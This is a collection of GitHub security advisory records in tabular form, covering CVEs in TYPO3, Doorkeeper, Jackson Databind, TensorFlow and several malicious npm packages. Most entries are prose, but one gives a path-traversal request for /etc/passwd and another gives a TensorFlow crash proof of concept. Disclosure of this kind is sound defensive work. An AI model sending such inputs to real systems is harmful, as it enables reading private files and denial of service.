Wrong usage of the TYPO3 FAL API results in copies of processed files being saved to the /var/transient/ folder of a TYPO3 website on every frontend request. This can result in Denial of Service, since the webspace may be filled up with image files simply by crafting a large amount of requests to the website.
|
{'CVE-2021-38623'}
|
2021-08-30T17:22:57Z
|
2021-08-30T17:22:57Z
|
HIGH
| 7
|
{'CWE-404'}
|
{'https://typo3.org/security/advisory/typo3-ext-sa-2021-009', 'https://github.com/advisories/GHSA-34jq-548x-m2x9', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38623'}
| null |
GHSA
|
GHSA-wv39-cgmm-cq29
|
Malicious Package in buffmr-xor
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-29T21:27:20Z
|
2020-09-03T22:23:00Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-wv39-cgmm-cq29', 'https://www.npmjs.com/advisories/1261'}
| null |
GHSA
|
GHSA-j7vx-8mqj-cqp9
|
Exposure of Sensitive Information to an Unauthorized Actor in Doorkeeper
|
### Impact
Information disclosure vulnerability. Allows an attacker to see all `Doorkeeper::Application` model attribute values (including secrets) using authorized applications controller if it's enabled (GET /oauth/authorized_applications.json).
### Patches
These versions have the fix:
* 5.0.3
* 5.1.1
* 5.2.5
* 5.3.2
### Workarounds
Patch `Doorkeeper::Application` model `#as_json(options = {})` method and define only those attributes you want to expose.
Additional recommended hardening is to enable application secrets hashing ([guide](https://doorkeeper.gitbook.io/guides/security/token-and-application-secrets)), available since Doorkeeper 5.1. This would render the exposed secret useless.
### References
- Commit with fix: https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10187
|
{'CVE-2020-10187'}
|
2022-04-19T19:02:27Z
|
2020-05-07T21:11:07Z
|
HIGH
| 7.5
|
{'CWE-862'}
|
{'https://github.com/advisories/GHSA-j7vx-8mqj-cqp9', 'https://github.com/doorkeeper-gem/doorkeeper/releases', 'https://github.com/rubysec/ruby-advisory-db/pull/446', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10187', 'https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6', 'https://github.com/doorkeeper-gem/doorkeeper/security/advisories/GHSA-j7vx-8mqj-cqp9'}
| null |
GHSA
|
GHSA-rx32-c25r-79mx
|
Directory Traversal in serverhuwenhui
|
Affected versions of `serverhuwenhui` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16102'}
|
2021-01-14T15:54:04Z
|
2020-09-01T16:54:41Z
|
HIGH
| 0
|
{'CWE-22'}
|
{'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serverhuwenhui', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16102', 'https://nodesecurity.io/advisories/366', 'https://www.npmjs.com/advisories/366', 'https://github.com/advisories/GHSA-rx32-c25r-79mx'}
| null |
GHSA
|
GHSA-x3m6-rprw-862w
|
Malicious Package in node-buc
|
All versions of `node-buc` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T19:50:50Z
|
2020-09-03T17:43:31Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-x3m6-rprw-862w', 'https://www.npmjs.com/advisories/1059'}
| null |
GHSA
|
GHSA-r97x-3g8f-gx3m
|
The Bouncy Castle JCE Provider carry a propagation bug
|
In the Bouncy Castle JCE Provider versions 1.51 to 1.55, a carry propagation bug was introduced in the implementation of squaring for several raw math classes have been fixed (org.bouncycastle.math.raw.Nat???). These classes are used by our custom elliptic curve implementations (org.bouncycastle.math.ec.custom.**), so there was the possibility of rare (in general usage) spurious calculations for elliptic curve scalar multiplications. Such errors would have been detected with high probability by the output validation for our scalar multipliers.
|
{'CVE-2016-1000340'}
|
2022-04-27T13:27:34Z
|
2018-10-17T16:23:50Z
|
HIGH
| 7.5
| null |
{'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/bcgit/bc-java/commit/790642084c4e0cadd47352054f868cc8397e2c00#diff-e5934feac8203ca0104ab291a3560a31', 'https://security.netapp.com/advisory/ntap-20181127-0004/', 'https://access.redhat.com/errata/RHSA-2018:2669', 'https://github.com/advisories/GHSA-r97x-3g8f-gx3m', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000340', 'https://access.redhat.com/errata/RHSA-2018:2927'}
| null |
GHSA
|
GHSA-rrm8-32g4-w8m3
|
Cross-site Request Forgery (CSRF)
|
CSRF in Bitly oauth2_proxy 2.1 during authentication flow
|
{'CVE-2017-1000069'}
|
2021-12-20T18:04:46Z
|
2021-12-20T18:04:46Z
|
HIGH
| 8.8
|
{'CWE-352'}
|
{'https://github.com/advisories/GHSA-rrm8-32g4-w8m3', 'https://github.com/bitly/oauth2_proxy/pull/360', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000069', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000069', 'https://github.com/bitly/oauth2_proxy/commit/55085d9697962668fd4e43e8e4644144fe83cd93'}
| null |
GHSA
|
GHSA-6pwf-whc8-hjf6
|
Downloads Resources over HTTP in baryton-saxophone
|
Affected versions of `baryton-saxophone` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `baryton-saxophone`.
## Recommendation
Update to version 3.0.1 or later.
|
{'CVE-2016-10573'}
|
2021-01-08T19:20:40Z
|
2019-02-18T23:35:18Z
|
HIGH
| 0
|
{'CWE-311'}
|
{'https://github.com/advisories/GHSA-6pwf-whc8-hjf6', 'https://www.npmjs.com/advisories/240', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10573', 'https://nodesecurity.io/advisories/240'}
| null |
GHSA
|
GHSA-r98r-j25q-rmpr
|
Type confusion in failure
|
An issue was discovered in the failure crate through 2019-11-13 for Rust. Type confusion can occur when __private_get_type_id__ is overridden.
|
{'CVE-2019-25010'}
|
2021-08-25T20:46:38Z
|
2021-08-25T20:46:38Z
|
CRITICAL
| 9.8
|
{'CWE-843'}
|
{'https://github.com/advisories/GHSA-r98r-j25q-rmpr', 'https://nvd.nist.gov/vuln/detail/CVE-2019-25010', 'https://rustsec.org/advisories/RUSTSEC-2019-0036.html', 'https://github.com/rust-lang-nursery/failure/issues/336'}
| null |
GHSA
|
GHSA-2j2x-hx4g-2gf4
|
In Bouncy Castle JCE Provider the DHIES implementation allowed the use of ECB mode
|
In the Bouncy Castle JCE Provider version 1.55 and earlier the DHIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.
|
{'CVE-2016-1000344'}
|
2022-04-27T13:32:11Z
|
2018-10-18T17:43:55Z
|
HIGH
| 7.4
|
{'CWE-1310'}
|
{'https://github.com/advisories/GHSA-2j2x-hx4g-2gf4', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000344', 'https://security.netapp.com/advisory/ntap-20181127-0004/', 'https://access.redhat.com/errata/RHSA-2018:2669', 'https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f', 'https://access.redhat.com/errata/RHSA-2018:2927'}
| null |
GHSA
|
GHSA-54mg-vgrp-mwx9
|
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Ratpack
|
Ratpack versions before 1.6.1 generate a session ID using a cryptographically weak PRNG in the JDK's ThreadLocalRandom. This means that if an attacker can determine a small window for the server start time and obtain a session ID value, they can theoretically determine the sequence of session IDs.
|
{'CVE-2019-11808'}
|
2021-08-04T15:01:31Z
|
2019-05-14T04:01:37Z
|
LOW
| 3.7
|
{'CWE-338'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-11808', 'https://github.com/ratpack/ratpack/releases/tag/v1.6.1', 'https://github.com/advisories/GHSA-54mg-vgrp-mwx9', 'https://github.com/ratpack/ratpack/issues/1448', 'https://github.com/ratpack/ratpack/commit/f2b63eb82dd71194319fd3945f5edf29b8f3a42d'}
| null |
GHSA
|
GHSA-288c-cq4h-88gq
|
XML External Entity (XXE) Injection in Jackson Databind
|
A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.
|
{'CVE-2020-25649'}
|
2022-04-22T17:22:57Z
|
2021-02-18T20:51:54Z
|
HIGH
| 7.5
|
{'CWE-611'}
|
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E', 'https://github.com/advisories/GHSA-288c-cq4h-88gq', 'https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT/', 'https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E', 'https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E', 'https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E', 'https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E', 'https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/issues/2589', 'https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E', 'https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E', 'https://bugzilla.redhat.com/show_bug.cgi?id=1887664', 'https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210108-0007/', 'https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E', 'https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E', 'https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25649', 'https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
| null |
GHSA
|
GHSA-vpw5-grxx-v396
|
CSRF token exposure in TYPO3 extension
|
When using the CsrfTokenViewHelper the extension discloses the user's session identifier to HTML output without processing of additional cryptographic hashing algorithms. This vulnerability cannot be exploited directly and occurs in combination with a chained attack - like for instance Cross Site Scripting in the frontend output.
|
{'CVE-2021-36793'}
|
2021-09-02T17:16:56Z
|
2021-09-02T17:16:56Z
|
HIGH
| 6.3
|
{'CWE-668'}
|
{'https://typo3.org/security/advisory/typo3-ext-sa-2021-008', 'https://github.com/advisories/GHSA-vpw5-grxx-v396', 'https://nvd.nist.gov/vuln/detail/CVE-2021-36793'}
| null |
GHSA
|
GHSA-w3g5-2848-2v8r
|
Data races in generator
|
The `Generator` type is an iterable which uses a generator function that yields
values. In affected versions of the crate, the provided function yielding values
had no `Send` bounds despite the `Generator` itself implementing `Send`.
The generator function lacking a `Send` bound means that types that are
dangerous to send across threads such as `Rc` could be sent as part of a
generator, potentially leading to data races.
This flaw was fixed in commit [`f7d120a3b`](https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0)
by enforcing that the generator function be bound by `Send`.
|
{'CVE-2020-36471'}
|
2021-08-25T20:57:05Z
|
2021-08-25T20:57:05Z
|
MODERATE
| 5.9
|
{'CWE-362'}
|
{'https://github.com/Xudong-Huang/generator-rs/issues/27', 'https://rustsec.org/advisories/RUSTSEC-2020-0151.html', 'https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0', 'https://github.com/advisories/GHSA-w3g5-2848-2v8r', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36471'}
| null |
GHSA
|
GHSA-gj77-59wh-66hg
|
Regular Expression Denial of Service (ReDoS) in Prism
|
Some languages before 1.24.0 are vulnerable to Regular Expression Denial of Service (ReDoS).
### Impact
When Prism is used to highlight untrusted (user-given) text, an attacker can craft a string that will take a very very long time to highlight. Do not use the following languages to highlight untrusted text.
- ASCIIDoc
- ERB
Other languages are __not__ affected and can be used to highlight untrusted text.
### Patches
This problem has been fixed in Prism v1.24.
### References
- PrismJS/prism#2774
- PrismJS/prism#2688
|
{'CVE-2021-32723'}
|
2022-02-08T21:21:39Z
|
2021-06-28T18:33:18Z
|
HIGH
| 7.4
|
{'CWE-400'}
|
{'https://github.com/PrismJS/prism/pull/2688', 'https://github.com/PrismJS/prism/commit/d85e30da6755fdbe7f8559f8e75d122297167018', 'https://github.com/PrismJS/prism/security/advisories/GHSA-gj77-59wh-66hg', 'https://github.com/PrismJS/prism/pull/2774', 'https://github.com/advisories/GHSA-gj77-59wh-66hg', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32723', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
| null |
GHSA
|
GHSA-8877-prq4-9xfw
|
Open Redirect in actionpack
|
The Host Authorization middleware in Action Pack before 6.1.2.1, 6.0.3.5 suffers from an open redirect vulnerability. Specially crafted `Host` headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. Impacted applications will have allowed hosts with a leading dot. When an allowed host contains a leading dot, a specially crafted `Host` header can be used to redirect to a malicious website.
|
{'CVE-2021-22881'}
|
2021-12-15T00:05:17Z
|
2021-03-02T03:44:17Z
|
MODERATE
| 6.1
|
{'CWE-601'}
|
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XQ3NS4IBYE2I3MVMGAHFZBZBIZGHXHT3/', 'https://benjamin-bouchet.com/cve-2021-22881-faille-de-securite-dans-le-middleware-hostauthorization/', 'http://www.openwall.com/lists/oss-security/2021/12/14/5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22881', 'https://discuss.rubyonrails.org/t/cve-2021-22881-possible-open-redirect-in-host-authorization-middleware/77130', 'https://hackerone.com/reports/1047447', 'http://www.openwall.com/lists/oss-security/2021/08/20/1', 'http://www.openwall.com/lists/oss-security/2021/05/05/2', 'https://rubygems.org/gems/actionpack', 'https://github.com/advisories/GHSA-8877-prq4-9xfw'}
| null |
GHSA
|
GHSA-vmh4-322v-cfpc
|
Cross-Site Scripting in cmmn-js-properties-panel
|
Versions of `cmmn-js-properties-panel` prior to 0.8.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website.
## Recommendation
Upgrade to version 0.8.0 or later.
| null |
2021-09-29T15:57:06Z
|
2020-09-03T18:18:06Z
|
HIGH
| 0
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-vmh4-322v-cfpc', 'https://www.npmjs.com/advisories/1080'}
| null |
GHSA
|
GHSA-fmfv-x8mp-5767
|
Improper input validation in Drupal core
|
Drupal core's form API has a vulnerability where certain contributed or custom modules' forms may be vulnerable to improper input validation. This could allow an attacker to inject disallowed values or overwrite data. Affected forms are uncommon, but in certain cases an attacker could alter critical or sensitive data.
|
{'CVE-2022-25271'}
|
2022-03-01T21:18:21Z
|
2022-02-18T00:00:37Z
|
HIGH
| 7.5
|
{'CWE-20'}
|
{'https://www.drupal.org/sa-core-2022-003', 'https://github.com/advisories/GHSA-fmfv-x8mp-5767', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25271'}
| null |
GHSA
|
GHSA-9m87-6fj3-c5xh
|
Untrusted Search Path in PNPM
|
PNPM prior to v6.15.1 was discovered to contain an untrusted search path which causes the application to behave in unexpected ways when users execute PNPM commands in a directory containing malicious content. This vulnerability occurs when the application is ran on Windows OS.
|
{'CVE-2022-26183'}
|
2022-03-30T21:04:53Z
|
2022-03-23T00:00:24Z
|
HIGH
| 8.8
|
{'CWE-426'}
|
{'https://github.com/advisories/GHSA-9m87-6fj3-c5xh', 'https://nvd.nist.gov/vuln/detail/CVE-2022-26183', 'https://github.com/pnpm/pnpm/commit/04b7f60861ddee8331e50d70e193d1e701abeefb', 'https://github.com/pnpm/pnpm/releases/tag/v6.15.1'}
| null |
GHSA
|
GHSA-m2mx-rfpw-jghv
|
DLL Injection in kerberos
|
Version of `kerberos` prior to 1.0.0 are vulnerable to DLL Injection. The package loads DLLs without specifying a full path. This may allow attackers to create a file with the same name in a folder that precedes the intended file in the DLL path search. Doing so would allow attackers to execute arbitrary code in the machine.
## Recommendation
Upgrade to version 1.0.0 or later.
| null |
2020-09-04T18:01:59Z
|
2020-09-04T18:01:59Z
|
HIGH
| 0
| null |
{'https://github.com/advisories/GHSA-m2mx-rfpw-jghv', 'https://www.npmjs.com/advisories/1514'}
| null |
GHSA
|
GHSA-5wm5-8q42-rhxg
|
File system access via H2 in Apache Ignite
|
Apache Ignite uses H2 database to build SQL distributed execution engine. H2 provides SQL functions which could be used by attacker to access to a filesystem.
|
{'CVE-2020-1963'}
|
2022-02-08T22:05:37Z
|
2020-06-05T16:11:02Z
|
CRITICAL
| 9.1
|
{'CWE-862'}
|
{'https://lists.apache.org/thread.html/r1933faf8a26c431f38a5f8dbbfab80254454e54e33a79be474b67dc4%40%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/re7b43cf8333ee30b6589e465f72a6ed4a082222612d1a0fdd30beb94@%3Cuser.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rd43ae18588fd7bdb375be63bc95a651aab319ced6306759e1237ce67@%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rdf37011b92a31a67c299ff45655e2638f194fc814e5c6e2fde352884@%3Cuser.ignite.apache.org%3E', 'https://github.com/advisories/GHSA-5wm5-8q42-rhxg', 'https://lists.apache.org/thread.html/rdf37011b92a31a67c299ff45655e2638f194fc814e5c6e2fde352884@%3Cdev.ignite.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1963', 'http://www.openwall.com/lists/oss-security/2020/06/03/2', 'https://lists.apache.org/thread.html/r119024ef71c8d39f952df0950a275d09714715179aff544aea0129a3@%3Cuser.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/re7b43cf8333ee30b6589e465f72a6ed4a082222612d1a0fdd30beb94@%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rf032a13a4711f88c0a2c0734eecbee1026cc1b6cde27d16a653f8755@%3Cdev.ignite.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
| null |
GHSA
|
GHSA-hr84-fqvp-48mm
|
Segfault in SparseCountSparseOutput
|
### Impact
Specifying a negative dense shape in `tf.raw_ops.SparseCountSparseOutput` results in a segmentation fault being thrown out from the standard library as `std::vector` invariants are broken.
```python
import tensorflow as tf
indices = tf.constant([], shape=[0, 0], dtype=tf.int64)
values = tf.constant([], shape=[0, 0], dtype=tf.int64)
dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64)
weights = tf.constant([], shape=[0, 0], dtype=tf.int64)
tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L199-L213) assumes the first element of the dense shape is always positive and uses it to initialize a `BatchedMap<T>` (i.e., [`std::vector<absl::flat_hash_map<int64,T>>`](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L27)) data structure.
```cc
bool is_1d = shape.NumElements() == 1;
int num_batches = is_1d ? 1 : shape.flat<int64>()(0);
...
auto per_batch_counts = BatchedMap<W>(num_batches);
```
If the `shape` tensor has more than one element, `num_batches` is the first value in `shape`.
Ensuring that the `dense_shape` argument is a valid tensor shape (that is, all elements are non-negative) solves this issue.
### Patches
We have patched the issue in GitHub commit [c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5](https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
|
{'CVE-2021-29521'}
|
2021-05-21T14:21:16Z
|
2021-05-21T14:21:16Z
|
LOW
| 2.5
|
{'CWE-131'}
|
